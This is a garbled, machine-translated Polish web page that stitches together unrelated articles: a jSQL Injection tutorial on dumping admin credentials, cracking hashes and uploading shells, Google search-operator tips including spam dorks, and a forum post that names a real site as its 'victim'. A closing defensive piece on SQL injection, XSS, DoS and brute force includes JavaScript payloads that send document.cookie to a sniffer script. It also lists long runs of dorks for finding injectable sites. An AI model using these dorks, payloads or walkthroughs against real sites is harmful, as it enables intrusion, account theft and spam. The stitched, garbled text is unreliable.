Instrukcja korzystania z jSQL Injection, wielofunkcyjnego narzędzia do wyszukiwania i wykorzystywania zastrzyków SQL w Kali Linux. Instrukcja korzystania z jSQL Injection - wielofunkcyjnego narzędzia do wyszukiwania i wykorzystywania zastrzyków SQL w Kali Linux

Dom / Zamarza

Uruchom pobrany plik podwójnym kliknięciem (musisz mieć plik maszyna wirtualna ).

3. Anonimowość podczas sprawdzania witryny pod kątem wstrzyknięcia SQL
Konfigurowanie Tora i Privoxy w Kali Linux

[Sekcja w przygotowaniu]

Konfigurowanie Tora i Privoxy w systemie Windows

[Sekcja w przygotowaniu]

Ustawienia proxy w Wstrzyknięcie jSQL

[Sekcja w przygotowaniu]

4. Sprawdzenie witryny pod kątem iniekcji SQL za pomocą jSQL Injection

Praca z programem jest niezwykle prosta. Wystarczy wpisać adres strony internetowej i nacisnąć ENTER.

Poniższy zrzut ekranu pokazuje, że witryna jest podatna na trzy rodzaje zastrzyków SQL (informacja o nich jest wskazana w prawym dolnym rogu). Klikając na nazwy zastrzyków możesz zmienić zastosowaną metodę:

Wyświetlono nam już także istniejące bazy danych.

Możesz wyświetlić zawartość każdej tabeli:

Zazwyczaj najciekawszą rzeczą w tabelach są poświadczenia administratora.

Jeśli będziesz mieć szczęście i odnajdziesz dane administratora, to jest za wcześnie na radość. Musisz jeszcze znaleźć panel administracyjny, w którym możesz wprowadzić te dane.

5. Wyszukaj panele administracyjne za pomocą jSQL Injection

W tym celu przejdź do kolejnej zakładki. Tutaj wita nas lista możliwych adresów. Możesz wybrać jedną lub więcej stron do sprawdzenia:

Wygoda polega na tym, że nie trzeba korzystać z innych programów.

Niestety, nie ma zbyt wielu nieostrożnych programistów, którzy przechowują hasła w postaci zwykłego tekstu. Dość często w wierszu hasła widzimy coś takiego

8743b52063cd84097a65d1633f5c74f5

To jest skrót. Możesz go odszyfrować za pomocą brutalnej siły. I... jSQL Injection ma wbudowaną brute-forcer.

6. Mieszanie brutalnej siły przy użyciu wtrysku jSQL

Niewątpliwą wygodą jest to, że nie trzeba szukać innych programów. Istnieje wsparcie dla wielu najpopularniejszych skrótów.

To nie jest najwięcej najlepsza opcja. Aby zostać guru w dekodowaniu skrótów, zaleca się książkę „” w języku rosyjskim.

Ale oczywiście, gdy nie ma pod ręką innego programu lub nie ma czasu na naukę, bardzo przydatny będzie jSQL Injection z wbudowaną funkcją brute force.

Istnieją ustawienia: możesz ustawić, które znaki mają być zawarte w haśle, zakres długości hasła.

7. Operacje na plikach po wykryciu zastrzyków SQL

Oprócz operacji na bazach danych - ich odczytywania i modyfikowania, w przypadku wykrycia zastrzyków SQL, można wykonać następujące operacje na plikach:

  • czytanie plików na serwerze
  • wgranie nowych plików na serwer
  • przesyłanie powłok na serwer

A wszystko to zaimplementowano w jSQL Injection!

Istnieją ograniczenia - serwer SQL musi mieć uprawnienia do plików. Ci rozsądni administratorzy systemu są niepełnosprawni i mają do nich dostęp system plików nie uda się tego zdobyć.

Obecność uprawnień do plików można dość łatwo sprawdzić. Przejdź do jednej z zakładek (odczyt plików, utworzenie powłoki, wgranie nowego pliku) i spróbuj wykonać jedną z określonych operacji.

Nadal bardzo ważna uwaga- musimy znać dokładną bezwzględną ścieżkę do pliku, z którym będziemy pracować - inaczej nic nie będzie działać.

Spójrz na poniższy zrzut ekranu:

Na jakąkolwiek próbę operacji na pliku odpowiadamy: Brak uprawnień FILE (brak uprawnień do pliku). I nic tu nie da się zrobić.

Jeśli zamiast tego pojawi się inny błąd:

Problem z zapisem do [nazwa_katalogu]

Oznacza to, że niepoprawnie podałeś ścieżkę bezwzględną, w której chcesz zapisać plik.

Aby odgadnąć ścieżkę absolutną, musisz przynajmniej ją znać system operacyjny na którym działa serwer. Aby to zrobić, przejdź do zakładki Sieć.

Ten wpis (wiersz Win64) daje nam powód, aby założyć, że mamy do czynienia z systemem operacyjnym Windows:

Keep-Alive: limit czasu=5, max=99 Serwer: Apache/2.4.17 (Win64) PHP/7.0.0RC6 Połączenie: Metoda Keep-Alive: HTTP/1.1 200 OK Długość zawartości: 353 Data: piątek, 11 grudnia 2015 11:48:31 GMT X-Powered-By: PHP/7.0.0RC6 Typ zawartości: tekst/html; zestaw znaków=UTF-8

Tutaj mamy trochę Uniksa (*BSD, Linux):

Kodowanie transferu: fragmentaryczne Data: piątek, 11 grudnia 2015 r. 11:57:02 GMT Metoda: HTTP/1.1 200 OK Keep-Alive: timeout=3, max=100 Połączenie: keep-alive Typ zawartości: tekst/html X- Obsługiwane przez: PHP/5.3.29 Serwer: Apache/2.2.31 (Unix)

A tutaj mamy CentOS:

Metoda: HTTP/1.1 200 OK Wygasa: czwartek, 19 listopada 1981 08:52:00 GMT Set-Cookie: PHPSESSID=9p60gtunrv7g41iurr814h9rd0; ścieżka=/ Połączenie: keep-alive X-Cache-Lookup: MISS z t1.hoster.ru:6666 Serwer: Apache/2.2.15 (CentOS) X-Powered-By: PHP/5.4.37 X-Cache: MISS z t1.hoster.ru Kontrola pamięci podręcznej: brak przechowywania, brak pamięci podręcznej, konieczność ponownej weryfikacji, sprawdzanie po = 0, sprawdzanie wstępne = 0 Pragma: brak pamięci podręcznej Data: piątek, 11 grudnia 2015 12:08:54 GMT Kodowanie transferu: fragmentaryczne Typ zawartości: tekst/html; zestaw znaków=WINDOWS-1251

W systemie Windows typowym folderem witryn jest C:\Server\data\htdocs\ . Ale tak naprawdę, jeśli ktoś „pomyślał” o stworzeniu serwera w systemie Windows, to najprawdopodobniej ta osoba nie słyszała nic o przywilejach. Dlatego powinieneś rozpocząć próbę bezpośrednio z katalogu C:/Windows/:

Jak widać, wszystko poszło dobrze za pierwszym razem.

Ale same powłoki jSQL Injection budzą moje wątpliwości. Jeśli masz uprawnienia do plików, możesz łatwo przesłać coś za pomocą interfejsu internetowego.

8. Zbiorcze sprawdzanie witryn pod kątem zastrzyków SQL

I nawet ta funkcja jest dostępna w jSQL Injection. Wszystko jest niezwykle proste - pobierz listę witryn (możesz zaimportować z pliku), wybierz te, które chcesz sprawdzić i kliknij odpowiedni przycisk, aby rozpocząć operację.

Wniosek z wtrysku jSQL

Wstrzykiwanie jSQL jest dobre, potężne narzędzie do wyszukiwania, a następnie wykorzystywania zastrzyków SQL znalezionych na stronach internetowych. Jego niewątpliwe zalety: łatwość obsługi, zabudowa powiązane funkcje. jSQL Injection może być najlepszym przyjacielem początkującego przy analizie stron internetowych.

Wśród niedociągnięć zwróciłbym uwagę na brak możliwości edycji baz danych (przynajmniej ja nie znalazłem takiej funkcjonalności). Podobnie jak wszystkie instrumenty z interfejs graficzny, jedną z wad tego programu można przypisać niemożności wykorzystania go w skryptach. Niemniej jednak w tym programie możliwa jest również pewna automatyzacja - dzięki wbudowanej funkcji masowego sprawdzania witryny.

Program jSQL Injection jest znacznie wygodniejszy w użyciu niż sqlmap. Ale sqlmap obsługuje więcej typów zastrzyków SQL, ma opcje pracy z zaporami plików i kilka innych funkcji.

Konkluzja: wtrysk jSQL - najlepszy przyjaciel początkujący haker.

Pomoc dla tego programu w Encyklopedii Kali Linux można znaleźć na tej stronie: http://kali.tools/?p=706

Jak poprawnie wyszukiwać za pomocą google.com

Chyba każdy wie, jak z tego skorzystać wyszukiwarka, jak Google =) Ale nie każdy o tym wie, jeśli poprawnie go skomponujesz zapytanie wyszukiwania za pomocą specjalnych projektów możesz znacznie sprawniej i szybciej osiągnąć to, czego szukasz =) W tym artykule postaram się pokazać, co i jak musisz zrobić, aby poprawnie wyszukiwać

Google obsługuje kilka operatorów wyszukiwania zaawansowanego, które mają specjalne znaczenie podczas wyszukiwania w witrynie google.com. Zazwyczaj operatorzy ci zmieniają wyszukiwanie lub nawet każą Google to zrobić całkowicie różne typy szukaj. Przykładowo łącze:konstrukcja jest operatorem specjalnym, a żądanie link:www.google.com nie przeprowadzi normalnego wyszukiwania, ale zamiast tego znajdzie wszystkie strony internetowe zawierające linki do google.com.
alternatywne typy żądań

pamięć podręczna: jeśli w zapytaniu dodasz inne słowa, Google podświetli te słowa w dokumencie buforowanym.
Na przykład, pamięć podręczna: witryna www.web wyświetli zawartość pamięci podręcznej z podświetlonym słowem „sieć”.

link: powyższe wyszukiwane hasło wyświetli strony internetowe zawierające łącza do określonego zapytania.
Na przykład: link:www.strona wyświetli wszystkie strony, które mają link do http://www.site

powiązane: Wyświetla strony internetowe, które są „powiązane” z określoną stroną internetową.
Na przykład, powiązane: www.google.com wyświetli listę stron internetowych, które są podobne strona główna Google.

info: Poproś o informacje: wyświetli niektóre informacje, jakie Google posiada na temat żądanej strony internetowej.
Na przykład, informacje:strona internetowa pokaże informacje o naszym forum =) (Armada - Forum dla dorosłych webmasterów).

Inne prośby o informacje

zdefiniuj: Zapytanie zdefiniuj: wyświetli definicję słów, które wpiszesz po nim, zebraną z różnych źródeł internetowych. Definicja będzie obejmowała całą wpisaną frazę (tzn. obejmie wszystkie słowa z konkretnego zapytania).

akcje: jeśli rozpoczniesz zapytanie od akcji: Google przetworzy pozostałe terminy zapytania jako symbole giełdowe i wyświetli link do strony zawierającej gotowe informacje dotyczące tych symboli.
Na przykład, akcje:Intel Yahoo wyświetli informacje o firmach Intel i Yahoo. (Pamiętaj, że powinieneś wpisać symbole najświeższych wiadomości, a nie nazwę firmy)

Modyfikatory zapytań

site: jeśli w zapytaniu dodasz site:, Google ograniczy wyniki do witryn znalezionych w tej domenie.
Możesz także wyszukiwać według poszczególnych stref, takich jak ru, org, com itp. ( strona: com strona: ru)

allintitle: Jeśli uruchomisz zapytanie z allintitle:, Google ograniczy wyniki do wszystkich słów zapytania w tytule.
Na przykład, tytuł całego: wyszukiwarka Google zwróci wszystkie strony Google według wyszukiwania, takiego jak obrazy, blog itp

intitle: Jeśli w zapytaniu podasz intitle:, Google ograniczy wyniki do dokumentów zawierających to słowo w tytule.
Na przykład, tytuł: Biznes

allinurl: Jeśli uruchomisz zapytanie za pomocą allinurl: Google ograniczy wyniki do wszystkich słów zapytania w adresie URL.
Na przykład, allinurl: wyszukiwarka Google zwróci dokumenty za pomocą Google i wyszuka w tytule. Opcjonalnie możesz też oddzielić słowa ukośnikiem (/), wtedy słowa po obu stronach ukośnika będą wyszukiwane na tej samej stronie: Przykład allinurl: foo/bar

inurl: Jeśli w zapytaniu podasz inurl:, Google ograniczy wyniki do dokumentów zawierających to słowo w adresie URL.
Na przykład, Adres animacji:strona

intext: wyszukuje tylko określone słowo w tekście strony, ignorując tytuł, teksty linków i inne rzeczy nie z nimi związane. Istnieje również pochodna tego modyfikatora - allintext: tj. ponadto wszystkie słowa w zapytaniu będą wyszukiwane tylko w tekście, co również może być ważne, pomijając często używane słowa w linkach
Na przykład, tekst:forum

zakres dat: wyszukiwania w przedziale czasowym (zakres dat: 2452389-2452389), daty dla godzin są w formacie juliańskim.

No i mnóstwo ciekawych przykładów zapytań

Przykłady pisania zapytań dla Google. Dla spamerów

Inurl:control.guest?a=sign

Site:books.dreambook.com „URL strony głównej” „Podpisz mój” inurl:sign

Witryna: strona główna www.freegb.net

Inurl:sign.asp „Liczba znaków”

„Wiadomość:” inurl:sign.cfm „Nadawca:”

Inurl:register.php „Rejestracja użytkownika” „Strona internetowa”

Inurl:edu/guestbook „Wpisz się do księgi gości”

Inurl:post „Opublikuj komentarz” „URL”

Inurl:/archives/ „Komentarze:” „Pamiętasz informacje?”

„Scenariusz i księga gości Utworzono:” „URL:” „Komentarze:”

Inurl:?action=dodaj „phpBook” „URL”

Tytuł: „Prześlij nową historię”

Czasopisma

Inurl:www.livejournal.com/users/ mode=reply

Inurl bestjournal.com/ mode=odpowiedź

Inurl:fastbb.ru/re.pl?

Inurl:fastbb.ru /re.pl? „Księga gości”

Blogi

Inurl:blogger.com/comment.g?”postID””anonymous”

Inurl:typepad.com/ „Opublikuj komentarz” „Pamiętasz dane osobowe?”

Inurl:greatestjournal.com/community/ „Komentarz do wpisu” „Adresy anonimowych plakatów”

„Komentarz do wpisu” „adresy anonimowych plakatów” -

Tytuł: „Opublikuj komentarz”

Inurl:pirillo.com „Opublikuj komentarz”

Fora

Inurl:gate.html?”name=Fora” “mode=odpowiedź”

Inurl:”forum/posting.php?mode=odpowiedź”

Inurl: „mes.php?”

Inurl:”członkowie.html”

Inurl:forum/memberlist.php?”

A więc teraz powiem ci, jak coś zhakować bez specjalnej wiedzy. Od razu powiem, że korzyści z tego są niewielkie, ale jednak.
Najpierw musisz znaleźć same witryny. Aby to zrobić, wejdź na google.com i wyszukaj dorks

Inurl:pageid= inurl:games.php?id= inurl:page.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id= inurl:article.php?id= inurl:show.php? id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurl:Stray- Pytania-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl: news.php?id= inurl:avd_start.php?avd= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl: select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:ogl_inet.php?ogl_id= inurl:fiche_spectacle.php?id= inurl:communique_detail.php?id= inurl:sem. php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurl:preview.php? id= inurl:loadpsb.php?id= inurl:opinions.php?id= inurl:spr.php?id= inurl:pages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurl:participant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl: prod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurl:person.php?id= inurl:productinfo.php?id= inurl:showimg.php?id= inurl:view. php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php? id= inurl:detail.php?ID= inurl:index.php?= inurl:profile_view.php?id= inurl:category.php?id= inurl:publications.php?id= inurl:fellows.php?id= inurl :downloads_info.php?id= inurl:prod_info.php?id= inurl:shop.php?do=part&id= inurl:productinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurl :product.php?id= inurl:releases.php?id= inurl:ray.php?id= inurl:produit.php?id= inurl:pop.php?id= inurl:shopping.php?id= inurl:productdetail .php?id= inurl:post.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php ?id= inurl:page.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurl:product_ranges_view.php?ID= inurl:shop_category.php?id= inurl:transcript.php ?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl :readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurl:product-item.php?id= inurl:sql.php?id= inurl :aboutbook.php?id= inurl:preview.php?id= inurl:loadpsb.php?id= inurl:pages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce .php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php ?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php? ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurl:opinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt= inurl:newscat.php?id= inurl:newsticker_info.php?idn= inurl:rubrika.php?idr= inurl:rubp.php?idr= inurl: oferta.php?idf= inurl:art.php?idm= inurl:title.php?id= inurl:.php?id=1" inurl:.php?cat=1" inurl:.php?catid= 1" inurl:.php?num=1" inurl:.php?bid=1" inurl:.php?pid=1" inurl:.php?nid=1"

oto mała lista. Możesz użyć swojego. I tak znaleźliśmy tę stronę. Na przykład http://www.vestitambov.ru/
Następnie pobierz ten program

**Ukryta treść: aby zobaczyć tę ukrytą treść, liczba postów musi wynosić 3 lub więcej.**

Kliknij OK. Następnie wstawiamy stronę ofiary.
Naciskamy start. Następnie czekamy na wyniki.
I tak program znalazł lukę w zabezpieczeniach SQL.

Następnie pobierz Havij, http://www.vestitambov.ru:80/index.php?module=group_programs&id_gp= wklej tam otrzymany link. Nie będę wyjaśniał, jak korzystać z Havij i gdzie go pobrać, nie jest trudno go znaleźć; Wszystko. Otrzymałeś potrzebne dane - hasło administratora, a potem wszystko zależy od Twojej wyobraźni.

P.S. To moja pierwsza próba napisania czegoś. Przepraszam, jeśli coś jest nie tak

Postanowiłem trochę porozmawiać bezpieczeństwo informacji. Artykuł będzie przydatny dla początkujących programistów oraz tych, którzy dopiero zaczynają zajmować się rozwojem Frontendu. Jaki jest problem?

Wielu początkujących programistów tak bardzo daje się ponieść pisaniu kodu, że zupełnie zapomina o bezpieczeństwie swojej pracy. A co najważniejsze, zapominają o takich lukach jak zapytania SQL i XXS. Wymyślają także łatwe hasła do swoich paneli administracyjnych i są poddawani brutalnej sile. Czym są te ataki i jak można ich uniknąć?

Wstrzyknięcie SQL

Wstrzykiwanie SQL to najczęstszy rodzaj ataku na bazę danych, który przeprowadzany jest podczas zapytania SQL o konkretny system DBMS. Wiele osób, a nawet dużych firm cierpi z powodu takich ataków. Powodem jest błąd programisty podczas pisania bazy danych i, ściśle mówiąc, zapytań SQL.

Atak SQL Injection jest możliwy na skutek nieprawidłowego przetwarzania danych wejściowych wykorzystywanych w zapytaniach SQL. Jeśli atak hakera zakończy się sukcesem, ryzykujesz utratą nie tylko zawartości baz danych, ale także haseł i logów panelu administracyjnego. Dane te wystarczą, aby całkowicie przejąć witrynę lub dokonać w niej nieodwracalnych zmian.

Atak można z powodzeniem odtworzyć w skryptach napisanych w PHP, ASP, Perl i innych językach. Powodzenie takich ataków zależy bardziej od tego, jaki system DBMS jest używany i jak zaimplementowany jest sam skrypt. Na świecie istnieje wiele witryn podatnych na ataki SQL. Łatwo to zweryfikować. Wystarczy wpisać „dorks” – są to specjalne zapytania umożliwiające wyszukiwanie wrażliwych witryn. Oto niektóre z nich:

  • inurl:index.php?id=
  • inurl:trainers.php?id=
  • inurl:buy.php?category=
  • inurl:article.php?ID=
  • inurl:play_old.php?id=
  • inurl:declaration_more.php?decl_id=
  • inurl:pageid=
  • inurl:games.php?id=
  • inurl:page.php?file=
  • inurl:newsDetail.php?id=
  • inurl:gallery.php?id=
  • inurl:article.php?id=

Jak z nich korzystać? Wystarczy wpisać je w wyszukiwarkę Google lub Yandex. Wyszukiwarka wyświetli nie tylko podatną na ataki witrynę, ale także stronę informującą o tej luce. Ale nie poprzestaniemy na tym i upewnimy się, że strona jest naprawdę podatna na ataki. W tym celu wystarczy po wartości „id=1” postawić pojedynczy cytat„'”. Coś takiego:

  • inurl:games.php?id=1’

A strona wyświetli nam błąd dotyczący Zapytanie SQL. Czego dalej potrzebuje nasz haker?

A potem potrzebuje tego samego linku do strony błędu. Następnie prace nad luką w większości przypadków odbywają się w dystrybucji „Kali linux” wraz z narzędziami do tej części: wprowadzeniem kodu wtrysku i wykonaniem niezbędnych operacji. Jak to się stanie, nie mogę ci powiedzieć. Ale informacje na ten temat można znaleźć w Internecie.

Atak XSS

Ten rodzaj ataku jest przeprowadzany Ciastka. Użytkownicy z kolei uwielbiają je zapisywać. Dlaczego nie? Co byśmy bez nich zrobili? W końcu dzięki plikom Cookies nie musimy setki razy wpisywać hasła do Vk.com czy Mail.ru. I niewielu jest takich, którzy im odmawiają. Ale w Internecie często pojawia się reguła dla hakerów: współczynnik wygody jest wprost proporcjonalny do współczynnika niepewności.

Aby przeprowadzić atak XSS, nasz haker potrzebuje znajomości JavaScript. Na pierwszy rzut oka język jest bardzo prosty i nieszkodliwy, ponieważ nie ma dostępu do zasobów komputera. Haker może pracować tylko z JavaScriptem w przeglądarce, ale to wystarczy. W końcu najważniejsze jest wprowadzenie kodu na stronę internetową.

Nie będę szczegółowo omawiał procesu ataku. Powiem ci tylko podstawy i znaczenie tego, jak to się dzieje.

Haker może dodać kod JS do jakiegoś forum lub księgi gości:

document.location.href =”http://192.168.1.7/sniff.php?test”

Skrypty przekierują nas na zainfekowaną stronę, gdzie zostanie wykonany kod: czy to sniffer, jakiś rodzaj magazynu, czy exploit, który w jakiś sposób ukradnie nasze pliki cookie z pamięci podręcznej.

Dlaczego JavaScript? Ponieważ JavaScript świetnie radzi sobie z żądaniami internetowymi i ma dostęp do plików cookie. Jeśli jednak nasz skrypt przeniesie nas na jakąś stronę, użytkownik z łatwością to zauważy. Tutaj haker stosuje bardziej przebiegłą opcję - po prostu wprowadza kod do obrazka.

Img=nowy obraz();

Img.src=”http://192.168.1.7/sniff.php?”+document.cookie;

Po prostu tworzymy obraz i przypisujemy do niego nasz skrypt jako adres.

Jak się przed tym wszystkim uchronić? To bardzo proste – nie klikaj podejrzanych linków.

Ataki DoS i DDos

DoS (z angielskiego Denial of Service - odmowa usługi) - atak hakerski NA systemu komputerowego aby doprowadzić ją do porażki. Jest to tworzenie warunków, w których działający w dobrej wierze użytkownicy systemu nie mogą uzyskać dostępu do dostarczonych treści zasoby systemowe(serwery) lub dostęp ten jest utrudniony. Awaria systemu może być także krokiem w stronę jego przejęcia, jeśli w sytuacji awaryjnej oprogramowanie wygeneruje jakieś krytyczne informacje: np. wersję, część kod programu itp. Ale najczęściej jest to miara presji ekonomicznej: utrata prostej usługi generującej dochód. Rachunki od dostawcy lub środki mające na celu uniknięcie ataku znacząco trafiają w „cel” w kieszeni. Obecnie najpopularniejsze są ataki DoS i DDoS, ponieważ pozwalają one na awarię niemal każdego systemu bez pozostawienia istotnych z prawnego punktu widzenia dowodów.

Jaka jest różnica między atakiem DoS i DDos?

DoS to atak zaprojektowany w sprytny sposób. Na przykład, jeśli serwer nie sprawdza poprawności przychodzących pakietów, haker może wysłać żądanie, którego przetworzenie zajmie całą wieczność, a procesor nie będzie miał wystarczającej ilości czasu na pracę z innymi połączeniami. W związku z tym klienci nie będą mogli skorzystać z usług. Jednak w ten sposób nie będzie możliwe przeciążanie ani wyłączanie dużych, znanych witryn. Uzbrojeni są w dość szerokie kanały i super mocne serwery, które bez problemu poradzą sobie z takim przeciążeniem.

DDoS to właściwie ten sam atak co DoS. Ale jeśli w DoS jest jeden pakiet żądań, to w DDoS może być ich setki lub więcej. Nawet supermocne serwery mogą nie poradzić sobie z takim przeciążeniem. Podam przykład.

Atak DoS ma miejsce wtedy, gdy prowadzisz z kimś rozmowę, ale wtedy pojawia się niegrzeczna osoba i zaczyna głośno krzyczeć. Rozmawianie jest albo niemożliwe, albo bardzo trudne. Rozwiązanie: wezwać ochronę, która uspokoi i wyprowadzi osobę z lokalu. Ataki DDoS mają miejsce wtedy, gdy na miejsce napływa tłum złożony z tysięcy źle wychowanych ludzi. W takim przypadku ochrona nie będzie w stanie wszystkich związać i zabrać.

DoS i DDoS przeprowadzane są z komputerów, tzw. zombie. Są to komputery użytkowników zhakowanych przez hakerów, którzy nawet nie podejrzewają, że ich maszyna uczestniczy w ataku na jakikolwiek serwer.

Jak się przed tym uchronić? Generalnie nie ma mowy. Możesz jednak utrudnić hakerowi zadanie. Aby to zrobić, musisz wybrać dobry hosting z potężnymi serwerami.

Atak brutalną siłą

Programista może wymyślić wiele systemów ochrony przed atakami, w pełni przejrzeć napisane przez nas skrypty, sprawdzić witrynę pod kątem luk w zabezpieczeniach itp. Ale jeśli chodzi o ostatni krok układ strony, a mianowicie gdy po prostu wpisze hasło na panelu administracyjnym, może zapomnieć o jednej rzeczy. Hasło!

Zdecydowanie nie zaleca się ustawiania prostego hasła. Może to być 12345, 1114457, vasya111 itp. Nie zaleca się ustawiania haseł krótszych niż 10-11 znaków. W przeciwnym razie możesz zostać ofiarą najczęstszego i nieskomplikowanego ataku - brutalnej siły.

Brute force to atak słownikowy wykorzystujący hasło specjalne programy. Słowniki mogą być różne: łaciński, wyliczający po liczbach, powiedzmy do pewnego zakresu, mieszany (łacina + cyfry), a zdarzają się nawet słowniki z unikalnymi znakami @#4$%&*~~`’”\ ? itp.

Oczywiście tego typu ataku można łatwo uniknąć. Wystarczy wymyślić złożone hasło. Nawet captcha może cię uratować. Ponadto, jeśli Twoja witryna jest utworzona na systemie CMS, wiele z nich wykrywa tego typu ataki i blokuje adres IP. Zawsze należy pamiętać, że im więcej różnych znaków w haśle, tym trudniej je odgadnąć.

Jak działają hakerzy? W większości przypadków albo podejrzewają, albo znają część hasła z wyprzedzeniem. Całkiem logiczne jest założenie, że hasło użytkownika z pewnością nie będzie składać się z 3 lub 5 znaków. Takie hasła prowadzą do częstych włamań. Zasadniczo hakerzy przyjmują zakres od 5 do 10 znaków i dodają kilka znaków, które mogą znać z góry. Następnie generowane są hasła o wymaganych zakresach. Dystrybucja Kali Linux ma nawet programy do takich przypadków. I voila, atak nie będzie już trwał długo, ponieważ objętość słownika nie jest już tak duża. Ponadto haker może wykorzystać moc karty graficznej. Część z nich obsługuje system CUDA, a prędkość wyszukiwania wzrasta nawet 10-krotnie. A teraz widzimy, że atak wygląda tak w prosty sposób całkiem realne. Ale nie tylko strony internetowe są narażone na brutalną siłę.

Drodzy programiści, nigdy nie zapominajcie o systemie bezpieczeństwa informacji, ponieważ dziś wiele osób, w tym państwa, pada ofiarą tego typu ataków. W końcu największą bezbronnością jest osoba, która zawsze może się gdzieś rozproszyć lub coś przeoczyć. Jesteśmy programistami, ale nie zaprogramowanymi maszynami. Zawsze bądź czujny, ponieważ utrata informacji może mieć poważne konsekwencje!

© 2024 ermake.ru - O naprawie komputerów PC - Portal informacyjny